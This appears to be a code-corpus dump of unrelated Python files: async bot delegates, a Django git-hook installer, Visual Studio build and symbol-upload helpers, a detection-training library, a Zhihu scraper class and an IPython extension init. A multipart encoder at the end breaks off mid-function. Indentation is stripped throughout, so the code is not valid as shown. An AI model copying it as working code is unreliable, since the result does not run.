# Mirror traditional version to avoid having to import one more module
from ..delegate import (
per_chat_id, per_chat_id_in, per_chat_id_except,
per_from_id, per_from_id_in, per_from_id_except,
per_inline_from_id, per_inline_from_id_in, per_inline_from_id_except,
per_application, per_message, per_event_source_id,
per_callback_query_chat_id, per_callback_query_origin,
until, chain, pair, pave_event_space,
include_callback_query_chat_id, intercept_callback_query_origin
)
def _ensure_coroutine_function(fn):
return fn if asyncio.iscoroutinefunction(fn) else asyncio.coroutine(fn)
def call(corofunc, *args, **kwargs):
"""
:return:
a delegator function that returns a coroutine object by calling
``corofunc(seed_tuple, *args, **kwargs)``.
"""
corofunc = _ensure_coroutine_function(corofunc)
def f(seed_tuple):
return corofunc(seed_tuple, *args, **kwargs)
return f
def create_run(cls, *args, **kwargs):
"""
:return:
a delegator function that calls the ``cls`` constructor whose arguments being
a seed tuple followed by supplied ``*args`` and ``**kwargs``, then returns
a coroutine object by calling the object's ``run`` method, which should be
a coroutine function.
"""
def f(seed_tuple):
j = cls(seed_tuple, *args, **kwargs)
return _ensure_coroutine_function(j.run)()
return f
def create_open(cls, *args, **kwargs):
"""
:return:
a delegator function that calls the ``cls`` constructor whose arguments being
a seed tuple followed by supplied ``*args`` and ``**kwargs``, then returns
a looping coroutine object that uses the object's ``listener`` to wait for
messages and invokes instance method ``open``, ``on_message``, and ``on_close``
accordingly.
"""
def f(seed_tuple):
j = cls(seed_tuple, *args, **kwargs)
async def wait_loop():
bot, msg, seed = seed_tuple
try:
handled = await helper._yell(j.open, msg, seed)
if not handled:
await helper._yell(j.on_message, msg)
while 1:
msg = await j.listener.wait()
await helper._yell(j.on_message, msg)
# These exceptions are "normal" exits.
except (exception.IdleTerminate, exception.StopListening) as e:
await helper._yell(j.on_close, e)
# Any other exceptions are accidents. **Print it out.**
# This is to prevent swallowing exceptions in the case that on_close()
# gets overridden but fails to account for unexpected exceptions.
except Exception as e:
traceback.print_exc()
await helper._yell(j.on_close, e)
return wait_loop()
return f
| mit | -7,109,834,925,645,704,000 | 35 | 87 | 0.643915 | false |
rentlytics/django-zerodowntime | zerodowntime/management/commands/install_git_hooks.py | 1 | 1517 | import os
import stat
from django.core.management import BaseCommand
COMMIT_MSG_HOOK = """
# BEGIN ZERODOWNTIME_COMMIT_MSG_HOOK
commit_regex='(\[allow\-unsafe\-migrations]|merge)'
if ! grep -iqE "$commit_regex" "$1"; then
source ./venv/bin/activate
./manage.py check_migrations
migration_check=$?
if [ $migration_check != 0 ]; then
echo "Aborting commit, caused by migrations incompatible with ZDCD." >&2
echo "To skip this check you can add '[allow-unsafe-migrations]' to your commit message." >&2
exit $migration_check
fi;
fi;
# END ZERODOWNTIME_COMMIT_MSG_HOOK
"""
class Command(BaseCommand):
help = 'Installs a git commit-msg hook which will ' \
'execute `./manage.py check_migrations` unless ' \
'the commit message contains "[allow-unsafe-migrations]"'
HOOK_PATH = '.git/hooks/'
def handle(self, *args, **options):
commit_msg_path = os.path.join(self.HOOK_PATH, 'commit-msg')
hook_exists = os.path.exists(commit_msg_path)
if hook_exists:
with open(commit_msg_path, 'r') as fp:
hook_content = fp.read()
else:
hook_content = '#!/usr/bin/env bash\n\n'
if 'ZERODOWNTIME_COMMIT_MSG_HOOK' not in hook_content:
hook_content += COMMIT_MSG_HOOK
with open(commit_msg_path, 'w') as fp:
fp.write(hook_content)
st = os.stat(commit_msg_path)
os.chmod(commit_msg_path, st.st_mode | stat.S_IEXEC)
| isc | -4,212,104,457,324,079,600 | 28.745098 | 99 | 0.616348 | false |
dontnod/nimp | nimp/build.py | 1 | 16076 | # -*- coding: utf-8 -*-
# Copyright (c) 2014-2019 Dontnod Entertainment
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
''' Utilities related to compilation '''
import logging
import os
import glob
import socket
import subprocess
import re
import nimp.system
import nimp.sys.platform
import nimp.sys.process
def msbuild(project_file, platform_name, configuration, project=None,
vs_version='14', dotnet_version='4.6', additional_flags=None ):
''' Builds a project with MSBuild '''
# Windows
if nimp.sys.platform.is_windows():
msbuild_path = _find_msbuild_path(vs_version)
if msbuild_path is None:
return False
needCapture = True
# Mac and Linux alike
else:
msbuild_path = 'xbuild'
needCapture = False
command = [ msbuild_path, project_file,
'/verbosity:minimal',
'/nologo',
'/p:TargetFrameworkVersion=v' + dotnet_version,
'/p:TargetFrameworkProfile=' ]
if project is not None:
command.append('/target:' + project)
if platform_name is not None:
platform_name = '"' + platform_name + '"' if ' ' in platform_name else platform_name
command.append('/p:Platform=' + platform_name)
if configuration is not None:
configuration = '"' + configuration + '"' if ' ' in configuration else configuration
command.append('/p:Configuration=' + configuration)
if additional_flags is not None:
command += additional_flags
result, output, _ = nimp.sys.process.call(command, capture_output=needCapture)
if nimp.sys.platform.is_windows() and 'Cannot run if when setup is in progress.' in output:
logging.error('Visual Studio appears to have failed')
return False
return result == 0
def vsbuild(solution, platform_name, configuration, project=None,
vs_version='14', target='Build', dotnet_version='4.6', use_msbuild=False):
''' Builds a project with Visual Studio '''
# Windows
if nimp.sys.platform.is_windows():
if use_msbuild:
msbuild_path = _find_msbuild_path(vs_version)
if msbuild_path is None:
logging.error('Unable to find Visual Studio %s', vs_version)
return False
command = [ msbuild_path, solution, '/verbosity:minimal', '/nologo',
'/p:Configuration=' + configuration,
'/p:Platform=' + platform_name,
'/p:TargetFrameworkVersion=v' + dotnet_version,
'/p:TargetFrameworkProfile=']
if project is not None:
command = command + ['/target:' + project]
else:
devenv_path = _find_devenv_path(vs_version)
if devenv_path is None:
logging.error('Unable to find Visual Studio %s', vs_version)
return False
command = [ devenv_path, solution ]
command = command + [ '/' + target, configuration + '|' + platform_name ]
if project is not None:
command = command + [ '/project', project ]
result, output, _ = nimp.sys.process.call(command, capture_output=True)
if 'Cannot run if when setup is in progress.' in output:
logging.error('Visual Studio appears to have failed')
return False
return result == 0
# Mac and Linux alike
command = [ 'xbuild', solution, '/verbosity:quiet', '/nologo',
'/p:Configuration=' + configuration,
'/p:Platform=' + platform_name,
'/p:TargetFrameworkVersion=v' + dotnet_version,
'/p:TargetFrameworkProfile=' ]
if project is not None:
command = command + [ '/target:' + project ]
return nimp.sys.process.call(command) == 0
def _find_msbuild_path(vs_version):
msbuild_path = None
# Sanitize vs_version
if vs_version == '2015':
vs_version = '14.0'
if vs_version == '2017':
vs_version = '15.0'
if vs_version == '2019':
# Changed path : MSBuild is installed in the \Current folder
# https://docs.microsoft.com/en-us/visualstudio/msbuild/whats-new-msbuild-16-0?view=vs-2019
vs_version = 'Current'
# For VS2017 and later, there is vswhere
vswhere_cmd = [ os.path.join(os.environ['ProgramFiles(x86)'], 'Microsoft Visual Studio/Installer/vswhere.exe') ]
vswhere_cmd += [ '-products', '*', '-requires', 'Microsoft.Component.MSBuild', '-property', 'installationPath' ]
result, output, _ = nimp.sys.process.call(vswhere_cmd, capture_output=True, hide_output=True)
if result == 0:
for line in output.split('\n'):
line = line.strip()
msbuild_path = os.path.join(line, 'MSBuild', vs_version, 'Bin', 'MSBuild.exe')
if os.path.exists(msbuild_path):
break
if not os.path.exists(msbuild_path):
logging.error('Unable to find MSBuild %s (%s)', vs_version, msbuild_path)
return None
msbuild_path = os.path.normpath(msbuild_path)
return msbuild_path
def _find_devenv_path(vs_version):
devenv_path = None
# Sanitize vs_version
if vs_version == '2015':
vs_version = '14'
if vs_version == '2017':
vs_version = '15'
if vs_version == '2019':
vs_version = '16'
# First try the registry, because the environment variable is unreliable
# (case of Visual Studio installed on a different drive; it still sets
# the envvar to point to C:\Program Files even if devenv.com is on D:\)
#pylint: disable=import-error
from winreg import OpenKey, QueryValue, HKEY_LOCAL_MACHINE
key_path = 'SOFTWARE\\Classes\\VisualStudio.accessor.' + vs_version + '.0\\shell\\Open'
try:
with OpenKey(HKEY_LOCAL_MACHINE, key_path) as key:
cmdline = QueryValue(key, 'Command')
if cmdline[:1] == '"':
cmdline = cmdline.split('"')[1]
elif ' ' in cmdline:
cmdline = cmdline.split(' ')[0]
devenv_path = cmdline.replace('devenv.exe', 'devenv.com')
#pylint: disable=broad-except
except Exception:
pass
# For VS2017 and later, there is vswhere
if not devenv_path:
vswhere_path = os.path.join(os.environ['ProgramFiles(x86)'], 'Microsoft Visual Studio/Installer/vswhere.exe')
result, output, _ = nimp.sys.process.call([vswhere_path], capture_output=True, hide_output=True)
if result == 0:
for line in output.split('\n'):
line = line.strip()
if 'installationPath: ' in line:
candidate = line.split(' ', 1)[1]
elif 'installationVersion: ' + vs_version in line:
devenv_path = os.path.join(candidate, 'Common7/IDE/devenv.com')
break
# If the registry key is unhelpful, try the environment variable
if not devenv_path:
vstools_path = os.getenv('VS' + vs_version + '0COMNTOOLS')
if vstools_path is not None:
# Sanitize this because os.path.join sometimes gets confused
if vstools_path[-1] in [ '/', '\\' ]:
vstools_path = vstools_path[:-1]
devenv_path = os.path.join(vstools_path, '../../Common7/IDE/devenv.com')
if not devenv_path or not os.path.exists(devenv_path):
return None
devenv_path = os.path.normpath(devenv_path)
logging.info("Found Visual Studio at %s", devenv_path)
return devenv_path
def install_distcc_and_ccache():
""" Install environment variables suitable for distcc and ccache usage
if relevant.
"""
distcc_dir = '/usr/lib/distcc'
ccache_dir = '/usr/lib/ccache'
# Make sure distcc will be called if we use ccache
if os.path.exists(distcc_dir):
logging.info('Found distcc, so setting CCACHE_PREFIX=distcc')
os.environ['CCACHE_PREFIX'] = 'distcc'
# Add ccache to PATH if it exists, otherwise add distcc
if os.path.exists(ccache_dir):
extra_path = ccache_dir
elif os.path.exists(distcc_dir):
extra_path = distcc_dir
else:
return
logging.info('Adding %s to PATH', extra_path)
os.environ['PATH'] = extra_path + ':' + os.getenv('PATH')
if os.path.exists(distcc_dir):
# Set DISTCC_HOSTS if necessary
if not os.getenv('DISTCC_HOSTS'):
hosts = subprocess.Popen(['lsdistcc'], stdout=subprocess.PIPE).communicate()[0].decode('utf-8')
hosts = ' '.join(hosts.split())
logging.debug('Setting DISTCC_HOSTS=%s', hosts)
os.environ['DISTCC_HOSTS'] = hosts
# Compute a reasonable number of workers for UBT
if not os.getenv('UBT_PARALLEL'):
workers = subprocess.Popen(['distcc', '-j'], stdout=subprocess.PIPE).communicate()[0].decode('utf-8')
logging.debug('Setting UBT_PARALLEL=%s', workers)
os.environ['UBT_PARALLEL'] = workers
def upload_symbols(env, symbols, config):
''' Uploads build symbols to a symbol server '''
if not (env.is_win64 or env.is_xsx or env.is_ps5):
logging.error("Plafrom must be win64, xsx or ps5")
return False
def _discover_latest_autosdk(platform):
'''look for autoSDK on buildmachine '''
# TODO: get this out of here and in a more generic place like system for example
host_name = socket.gethostname()
is_build_worker = host_name.startswith('farmagent') or host_name.startswith('linuxagent')
platform = 'GDK' if platform in ['win64', 'xsx'] else platform
auto_sdk_root = 'D:/autoSDK/HostWin64/' + platform.upper()
if not is_build_worker or not os.path.exists((auto_sdk_root)):
return None
possible_paths = os.listdir(auto_sdk_root)
if platform == 'ps5':
# possible falvours : PS5/2.00.00.09/NotForLicensees/2.000/
# possible falvours : PS5/2.000.009/NotForLicensees/2.000/
pattern = r'^\d?(\d).\d+.\d+?(.\d+)$'
else:
# possible flavours like GDK/200806/
pattern = r'^\d{6}$'
possible_paths = sorted([ p for p in possible_paths if re.match(pattern, p)], reverse=True )
if platform == 'ps5': # sort possible flavours like 2.00.00.89 and 2.000.089, sigh...
dotless_paths = sorted([ (path.replace('.', ''), path) for path in possible_paths ], reverse=True)
possible_paths = [ dot for dotless, dot in dotless_paths ]
if possible_paths != []: # second round of version guessing for ps5, sigh...
auto_sdk_root += '/' + possible_paths[0] + '/NotForLicensees/'
possible_paths = os.listdir(auto_sdk_root)
possible_paths = sorted([p for p in possible_paths if re.match(r'\d?(\d).\d+', p)], reverse=True)
if possible_paths == []:
return None
auto_sdk_root += '/' + possible_paths[0]
return auto_sdk_root
# create store if not available yet
store_root = nimp.system.sanitize_path(os.path.join(env.format(env.publish_symbols), env.platform.lower()))
if not os.path.exists(store_root):
nimp.system.safe_makedirs(store_root)
# find the tool to upload our symbols
sym_tool_path = "C:/Program Files (x86)/Windows Kits/10/Debuggers/x64/symstore.exe"
if env.is_ps5: # ps5 sym tool
auto_sdk_root = _discover_latest_autosdk(env.platform)
prospero_local_root = os.getenv('SCE_PROSPERO_SDK_DIR', default=None)
assert prospero_local_root or auto_sdk_root
ps5_sdk_root = auto_sdk_root if auto_sdk_root else prospero_local_root
sym_tool_path = os.path.join(ps5_sdk_root, 'host_tools', 'bin', 'prospero-symupload.exe')
else: # autoSDK win10 sdk
win10_sdk_path = 'D:/autoSDK/HostWin64/Win64/Windows Kits/10/Debuggers/x64/symstore.exe'
if os.path.isfile(win10_sdk_path):
sym_tool_path = win10_sdk_path
sym_tool_path = nimp.system.sanitize_path(sym_tool_path)
logging.debug('Using sym-too-path -> %s' % sym_tool_path)
# Create response file
index_file = "symbols_index.txt"
with open(index_file, "w") as symbols_index:
for src, _ in symbols:
logging.debug("adding %s to response file %s" % (src, index_file))
symbols_index.write(src + "\n")
# transaction tag
transaction_comment = "{0}_{1}_{2}_{3}".format(env.project, env.platform, config, env.revision)
# common cmd params
compress = "/compress" if hasattr(env, 'compress') and env.compress else ""
cmd = [
sym_tool_path,
"add",
"/r", # Recursive
"/f", "@" + index_file, # add files from response file
"/s", store_root, # target symbol store
"/o", # Verbose output
compress, # compression
]
# platform specific cmd params
if env.is_ps5:
cmd += [
"/tag", transaction_comment, # tag symbols
]
if env.is_microsoft_platform:
cmd += [
"/t", env.project, # Product name
"/c", transaction_comment,
"/v", env.revision,
]
if env.dry_run:
logging.info('dry run : %s' % ' '.join(cmd))
if not env.dry_run:
if nimp.sys.process.call(cmd) != 0:
# Do not remove symbol index; keep it for later debugging
return False
os.remove(index_file)
return True
def get_symbol_transactions(symsrv):
''' Retrieves all symbol transactions from a symbol server '''
server_txt_path = os.path.join(symsrv, "000Admin", "server.txt")
if not os.path.exists(server_txt_path):
logging.error("Unable to find the file %s, aborting.", server_txt_path)
return None
line_re = re.compile(r"^(?P<id>\d*),"
r"(?P<operation>(add|del)),"
r"(?P<type>(file|ptr)),"
r"(?P<creation_date>\d{2}\/\d{2}\/\d{4}),"
r"(?P<creation_time>\d{2}:\d{2}:\d{2}),"
r"\"(?P<product_name>[^\"]*)\","
r"\"(?P<version>[^\"]*)\","
r"\"(?P<comment>[^\"]*)\",$")
transaction_infos = []
with open(server_txt_path, "r") as server_txt:
for line in server_txt.readlines():
match = line_re.match(line)
if not match:
logging.error("%s is not recognized as a server.txt transaction entry", line)
return None
transaction_infos += [match.groupdict()]
return transaction_infos
def delete_symbol_transaction(symsrv, transaction_id):
''' Deletes a symbol transaction from a Microsoft symbol repository '''
command = [ "C:/Program Files (x86)/Windows Kits/8.1/Debuggers/x64/symstore.exe",
"del",
"/i",
transaction_id,
"/s",
symsrv]
if nimp.sys.process.call(command) != 0:
return False
return True
| mit | 5,637,544,502,031,619,000 | 40.647668 | 117 | 0.602762 | false |
jccaicedo/localization-agent | utils/libLearning.py | 1 | 10431 | import numpy as np
import utils as cu
import libDetection as det
import dataProcessor as dp
from utils import emptyMatrix
###############################################
# Hard Negative Mining
###############################################
class HardNegativeMining():
def __init__(self,currentModel,maxVectorsPerImage):
self.currentModel = currentModel
self.maxVectorsPerImage = maxVectorsPerImage
def run(self,img,features,bboxes):
pred = self.currentModel.predict(features,bboxes)
candidates = pred > -1.0001
f = features[candidates]
p = pred[candidates]
bboxes = [bboxes[i] for i in range(len(bboxes)) if candidates[i]]
# Sort candidate detections by score
s = np.argsort(p)
j = min(2*self.maxVectorsPerImage,f.shape[0])
# Keep top candidates only
if j > 0:
return (f[ s[-j:] ], p[ s[-j:] ], bboxes)
else:
return None
def getHardNegatives(negativesDir,negativesList,featuresExt,numFeatures,maxVectors,currentModel):
maxVectorsPerImage = maxVectors/len(negativesList)
i = 0
task = HardNegativeMining(currentModel,maxVectorsPerImage)
result = dp.processData(negativesList,negativesDir,featuresExt,task)
hardng = emptyMatrix([2*maxVectors,numFeatures])
boxes = []
while len(result) > 0:
data = result.pop(0)
if data[0].shape[0]+i > hardng.shape[0]:
print 'Not enough matrix space'
hardng = np.concatenate( (hardng,emptyMatrix([maxVectors,numFeatures])) )
hardng[i:i+data[0].shape[0],:] = data[0]
boxes += data[2]
i = i + data[0].shape[0]
return hardng[0:i,:],boxes[0:i]
###############################################
# Random Negative Windows Filter
###############################################
class RandomNegativesFilter():
def __init__(self,numFeatures,randomBoxes):
self.numFeatures = numFeatures
self.randomBoxes = randomBoxes
def run(self,img,features,bboxes):
boxes = range(0,features.shape[0])
cu.rnd.shuffle(boxes)
m = min(features.shape[0],self.randomBoxes)
bboxes = [bboxes[i] for i in boxes]
return (features[boxes[0:m]],bboxes)
def getRandomNegs(featuresDir,negativeList,featuresExt,numFeatures,maxVectors,maxNegativeImages):
randomBoxes = maxVectors/maxNegativeImages
cu.rnd.shuffle(negativeList)
task = RandomNegativesFilter(numFeatures,randomBoxes)
negatives = [negativeList.pop(0) for i in range(maxNegativeImages)]
result = dp.processData(negatives,featuresDir,featuresExt,task)
neg = emptyMatrix([maxVectors,numFeatures])
boxes = []
n = 0
while len(result) > 0:
mat,box = result.pop()
neg[n:n+mat.shape[0]] = mat
n = n + mat.shape[0]
boxes += box
return (neg[0:n],boxes[0:n])
###############################################
# Negative-Windows-From-Positive-Images Filter
###############################################
class NWFPIFilter():
def __init__(self,groundTruths,featuresDir,featuresExt,maxNegatives,overlap,model):
self.groundTruths = groundTruths
self.featuresDir = featuresDir
self.featuresExt = featuresExt
self.maxNegatives = maxNegatives
self.overlap = overlap
self.model = model
def rank(self,img,features,bboxes):
pred = self.model.predict(features,bboxes)
candidates = pred > -1.0001
f = features[candidates]
b = [bboxes[t] for t in range(len(bboxes)) if candidates[t]]
p = pred[candidates]
# Sort candidate detections by score
s = np.argsort(p)
j = min(2*self.maxNegatives,f.shape[0])
# Keep top candidates only
if j > 0:
return (f[ s[-j:] ], [ b[t] for t in s[-j:] ])
else:
return None,None
def run(self,img,features,bboxes):
if self.model:
features,bboxes = self.rank(img,features,bboxes)
if features == None:
return ([],[],[],[])
positives,negatives = [],[]
imageData = self.groundTruths[img]
for i in range( len(bboxes) ):
isPositive,isNegative = False,False
for j in imageData:
o = det.IoU(j,map(float,bboxes[i][1:]))
if o >= 0.85:
isPositive = True
break
elif self.overlap >= o and o > 0:
isNegative = True
if isPositive:
positives.append(i)
if isNegative:
negatives.append(i)
if self.model:
negatives.reverse()
else:
cu.rnd.shuffle(negatives)
posIdx = [bboxes[t] for t in positives]
posFeat = [features[positives]]
negIdx = [bboxes[t] for t in negatives[0:self.maxNegatives]]
negFeat = [features[negatives[0:self.maxNegatives]]]
return (posIdx,posFeat,negIdx,negFeat)
def selectNegativeWindowsFromPositiveImages(groundTruths,featuresDir,featuresExt,maxVectors,overlap,model=False):
gtb = dict()
for x in groundTruths:
im,bx = x[0],map(float,x[1:])
try:
gtb[im].append(bx)
except:
gtb[im] = [bx]
task = NWFPIFilter(gtb,featuresDir,featuresExt,maxVectors/len(gtb.keys()),overlap,model)
result = dp.processData(gtb.keys(),featuresDir,featuresExt,task)
posIdx,posFeat,negIdx,negFeat = [],[],[],[]
for r in result:
posIdx += r[0]
posFeat += r[1]
negIdx += r[2]
negFeat += r[3]
Xp = emptyMatrix( (len(posIdx),posFeat[0].shape[1]) )
Xn = emptyMatrix( (len(negIdx),negFeat[0].shape[1]) )
k = 0
for i in range(len(posFeat)):
Xp[k:k+posFeat[i].shape[0],:] = posFeat[i]
k = k + posFeat[i].shape[0]
k = 0
for i in range(len(negFeat)):
Xn[k:k+negFeat[i].shape[0],:] = negFeat[i]
k + k + negFeat[i].shape[0]
print 'NegFromPos ready:',len(negIdx)
return {'posIdx':posIdx, 'posFeat':Xp, 'negIdx':negIdx, 'negFeat':Xn}
###############################################
# Cross-validation evaluation
###############################################
def reportCrossValidationPerformance(clf,X,Y):
from sklearn import cross_validation
import sklearn.metrics as met
skf = cross_validation.StratifiedKFold(Y, n_folds=10)
p,r = 0.0,0.0
for train_index, test_index in skf:
X_train, X_test = X[train_index], X[test_index]
Y_train, Y_test = Y[train_index], Y[test_index]
clf.fit(X_train,Y_train)
# Performance measures:
pred = clf.predict(X_test)
cfm = met.confusion_matrix(Y_test,pred)
precision = float(cfm[1][1])/(cfm[1][1] + cfm[0][1])
recall = float(cfm[1][1])/(cfm[1][1] + cfm[1][0])
p += precision
r += recall
print '{:.4f} {:.4f}'.format(precision,recall)
print cfm
print 'AVG {:.4f} {:.4f}'.format(p/10.0, r/10.0)
###############################################
# Load Hard Negatives from predefined list
###############################################
class LoadHardNegatives():
def __init__(self,boxInfo):
self.boxInfo = boxInfo
def run(self,img,features,bboxes):
wanted = set([ ':'.join(map(str,x)) for x in self.boxInfo[img] ])
candidates = []
imgList = []
box = []
for i in range(len(bboxes)):
b = bboxes[i]
boxHash = ':'.join(b[1:])
if boxHash in wanted:
candidates.append(True)
imgList.append(img)
box.append(b)
wanted.remove(boxHash)
else:
candidates.append(False)
candidates = np.asarray(candidates)
return (features[candidates],imgList,box)
def loadHardNegativesFromList(featuresDir,negativesInfo,featuresExt,numFeatures,totalNegatives,idx=False):
i = 0
task = LoadHardNegatives(negativesInfo)
result = dp.processData(negativesInfo.keys(),featuresDir,featuresExt,task)
hardng = emptyMatrix([totalNegatives,numFeatures])
hardNames = []
boxes = []
while len(result) > 0:
data,imgs,box = result.pop(0)
hardng[i:i+data.shape[0],:] = data
hardNames += imgs
boxes += box
i = i + data.shape[0]
return (hardng[0:i,:],boxes)
def parseRankedDetectionsFile(detectionsLog,maxNegOverlap,maxNegativeVectors):
## Read ranked list of negatives
if isinstance(detectionsLog, basestring):
log = [x.split() for x in open(detectionsLog)]
else:
log = detectionsLog
posExamples = dict()
negExamples = dict()
posCount,negCount,noCares,negTaken = 0,0,0,0
for l in log:
if l[7] == '1':
posCount += 1
try:
posExamples[l[0]] += [ l[1:5] ]
except:
posExamples[l[0]] = [ l[1:5] ]
elif l[7] == '0' and float(l[6]) <= maxNegOverlap:
negCount += 1
if negCount < maxNegativeVectors:
negTaken += 1
try:
negExamples[l[0]] += [ l[1:5] ]
except:
negExamples[l[0]] = [ l[1:5] ]
else:
noCares += 1
print 'NEGEXAMPLES:',np.sum( [len(negExamples[i]) for i in negExamples.keys()] )
print 'Log Of Detections: Pos {:} Neg {:} NoCares {:}'.format(posCount,negCount,noCares)
return {'posExamples':posExamples,'negExamples':negExamples,'negTaken':negTaken}
###############################################
# Compute aspect ratio and size features
###############################################
def addAspectRatioAndSizeFeatures(features,index,aspectRatios,objectSizes):
fs = 12
boxes = np.asmatrix( [ map(float,x[1:]) for x in index] )
imgSize = np.max(boxes,axis=0)[0,2:]
sizes = np.asarray(boxes[:,2]-boxes[:,0])*np.asarray(boxes[:,3]-boxes[:,1])/(500*500) #/(imgSize[0,0]*imgSize[0,1])
sizeF = np.tile(sizes, (1, fs)) - np.tile(objectSizes,(sizes.shape[0],1))
ratios = np.asarray(boxes[:,2]-boxes[:,0])/np.asarray(boxes[:,3]-boxes[:,1])
ratioF = np.tile(ratios, (1, fs)) - np.tile(aspectRatios,(sizes.shape[0],1))
# **
S = np.argsort(np.abs(sizeF),axis=1)
R = np.argsort(np.abs(ratioF),axis=1)
for i in range(len(S)):
sizeF[ i, S[i] ] = [1.,.5,.25,.125,.0625,0.,0.,0.,0.,0.,0.,0.]
ratioF[i, R[i] ] = [1.,.5,.25,.125,.0625,0.,0.,0.,0.,0.,0.,0.]
# **
return np.concatenate( (features, sizeF, ratioF), axis=1 )
def computeAspectRatioAndSizeIntervals(index):
boxes = np.asmatrix( [ map(float,x[1:]) for x in index] )
imgSize = np.max(boxes,axis=0)[0,2:]
sizes = np.asarray(boxes[:,2]-boxes[:,0])*np.asarray(boxes[:,3]-boxes[:,1])/(500*500) #/(imgSize[0,0]*imgSize[0,1])
objectSizes = np.percentile(sizes,range(5,100,10))
ratios = np.asarray(boxes[:,2]-boxes[:,0])/np.asarray(boxes[:,3]-boxes[:,1])
aspectRatios = np.percentile(ratios,range(5,100,10))
# **
objectSizes = [objectSizes[0]*0.5] + objectSizes + [1.0]
aspectRatios = [aspectRatios[0]*0.5] + aspectRatios + [aspectRatios[-1]*1.5]
# **
print 'AspectRatios:',aspectRatios
print 'ObjectSizes:',objectSizes
return aspectRatios,objectSizes
| mit | 583,949,107,760,448,000 | 33.886288 | 117 | 0.615377 | false |
lishubing/zhihu-py3 | zhihu/topic.py | 1 | 3749 | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
__author__ = '7sDream'
from .common import *
class Topic:
"""答案类,请使用``ZhihuClient.topic``方法构造对象."""
@class_common_init(re_topic_url)
def __init__(self, url, name=None, session=None):
"""创建话题类实例.
:param url: 话题url
:param name: 话题名称,可选
:return: Topic
"""
self.url = url
self._session = session
self._name = name
def _make_soup(self):
if self.soup is None:
self.soup = BeautifulSoup(self._session.get(self.url).content)
@property
@check_soup('_name')
def name(self):
"""获取话题名称.
:return: 话题名称
:rtype: str
"""
return self.soup.find('h1').text
@property
@check_soup('_follower_num')
def follower_num(self):
"""获取话题关注人数.
:return: 关注人数
:rtype: int
"""
follower_num_block = self.soup.find(
'div', class_='zm-topic-side-followers-info')
# 无人关注时 找不到对应block,直接返回0 (感谢知乎用户 段晓晨 提出此问题)
if follower_num_block.strong is None:
return 0
return int(follower_num_block.strong.text)
@property
@check_soup('_photo_url')
def photo_url(self):
"""获取话题头像图片地址.
:return: 话题头像url
:rtype: str
"""
if self.soup is not None:
img = self.soup.find('a', id='zh-avartar-edit-form').img['src']
return img.replace('_m', '_r')
@property
@check_soup('_description')
def description(self):
"""获取话题描述信息.
:return: 话题描述信息
:rtype: str
"""
if self.soup is not None:
desc = self.soup.find('div', class_='zm-editable-content').text
return desc
@property
@check_soup('_top_answers')
def top_answers(self):
"""获取话题下的精华答案.
:return: 话题下的精华答案,返回生成器.
:rtype: Answer.Iterable
"""
from .question import Question
from .answer import Answer
from .author import Author
if self.url is None:
return
for page_index in range(1, 50):
html = self._session.get(
self.url + 'top-answers?page=' + str(page_index)).text
soup = BeautifulSoup(html)
if soup.find('div', class_='error') != None:
return
questions = soup.find_all('a', class_='question_link')
answers = soup.find_all(
'a', class_=re.compile(r'answer-date-link.*'))
authors = soup.find_all('h3', class_='zm-item-answer-author-wrap')
upvotes = soup.find_all('a', class_='zm-item-vote-count')
for ans, up, q, au in zip(answers, upvotes, questions, authors):
answer_url = Zhihu_URL + ans['href']
question_url = Zhihu_URL + q['href']
question_title = q.text
upvote = int(up['data-votecount'])
question = Question(question_url, question_title,
session=self._session)
if au.text == '匿名用户':
author = Author(None, name='匿名用户', session=self._session)
else:
author_url = Zhihu_URL + au.a['href']
author = Author(author_url, session=self._session)
yield Answer(answer_url, question, author, upvote,
session=self._session)
| mit | 1,154,990,247,466,391,800 | 28.615385 | 78 | 0.516883 | false |
gems-uff/noworkflow | capture/noworkflow/now/ipython/__init__.py | 1 | 1194 | # Copyright (c) 2016 Universidade Federal Fluminense (UFF)
# Copyright (c) 2016 Polytechnic Institute of New York University.
# This file is part of noWorkflow.
# Please, consult the license terms in the LICENSE file.
"""IPython Module"""
from __future__ import (absolute_import, print_function,
division)
from ..persistence.models import * # pylint: disable=wildcard-import
from ..persistence import persistence_config, relational, content
def init(path=None, ipython=None):
"""Initiate noWorkflow extension.
Load D3, IPython magics, and connect to database
Keyword Arguments:
path -- database path (default=current directory)
ipython -- IPython object (default=None)
"""
import os
from .magics import register_magics
try:
from .hierarchymagic import load_ipython_extension as load_hierarchy
load_hierarchy(ipython)
except ImportError:
print("Warning: Sphinx is not installed. Dot "
"graphs won't work")
register_magics(ipython)
if path is None:
path = os.getcwd()
persistence_config.connect(path)
return u"ok"
| mit | -3,581,050,087,282,086,000 | 29.615385 | 114 | 0.659966 | false |
bartekbp/intelidzentaj | choregraphe-dir/personRecognizerProxy.py | 1 | 2453 | import httplib
import random
import string
import sys
import mimetypes
import urllib2
import httplib
import time
import re
def random_string(length):
return ''.join(random.choice(string.letters) for ii in range(length + 1))
def encode_multipart_data(data, files, binary):
boundary = random_string(30)
def get_content_type(filename):
return mimetypes.guess_type(filename)[0] or 'application/octet-stream'
def encode_field(field_name):
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"' % field_name,
'', str(data[field_name]))
def encode_file(field_name):
filename = files[field_name]
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"; filename="%s"' % (field_name, filename),
'Content-Type: %s' % get_content_type(filename),
'', open(filename, 'rb').read())
def encode_binary(field_name):
return ('--' + boundary,
'Content-Disposition: form-data; name="%s"; filename="%s"' % (field_name, field_name),
'Content-Type: image/jpeg',
'', binary[field_name])
lines = []
for name in data:
lines.extend(encode_field(name))
for name in files:
